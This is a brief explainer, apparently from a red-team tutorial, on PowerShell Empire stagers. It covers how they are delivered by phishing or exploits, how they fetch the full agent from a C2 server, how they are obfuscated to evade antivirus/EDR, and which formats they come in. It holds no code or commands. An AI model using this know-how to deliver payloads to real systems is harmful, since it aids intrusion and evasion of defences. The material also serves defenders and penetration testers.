stagers
A stager in PowerShell Empire is a lightweight initial payload whose primary job is to retrieve and execute the full agent from the command and control (C2) server. It is the first stage of infection,
stagers
How It Works:
- The attacker generates a stager using a listener (e.g., HTTP, SMB, etc.)
- The stager is delivered to the target via:
- Phishing email
- Exploit payload
- Manual execution
- Upon execution, the stager:
- Establishes communication with the listener
- Downloads and executes the full agent
- The agent then maintains persistence and allows post-exploitation commands
Why Use Stagers?
| Advantage | Description |
|---|---|
| 🎯 Minimal Size | Small and easy to deliver in phishing, macros, exploits, etc. |
| 🦾 Modular | Separates staging from full agent functionality |
| 🕵️ Stealthy | Can be obfuscated or encoded to evade antivirus/EDR |
| 🔌 Flexible Delivery | Available in multiple formats (PowerShell, VBA, DLL, EXE, etc.) |
Stager Formats
PowerShell Empire supports various stager types, including:
| Stager Type | Description |
|---|---|
launcher |
A simple PowerShell command used in phishing/macro |
multi/launcher |
Executes in multiple phases (good for AV evasion) |
dll |
Compiled dynamic link library |
hta |
HTML Application for browser-based delivery |
macro |
VBA macro for embedding in Office documents |
macro_launcher |
Combo of launcher and macro in one |
war / jsp |
Web app payloads for Java-based servers |
exe |
Executable file for direct execution |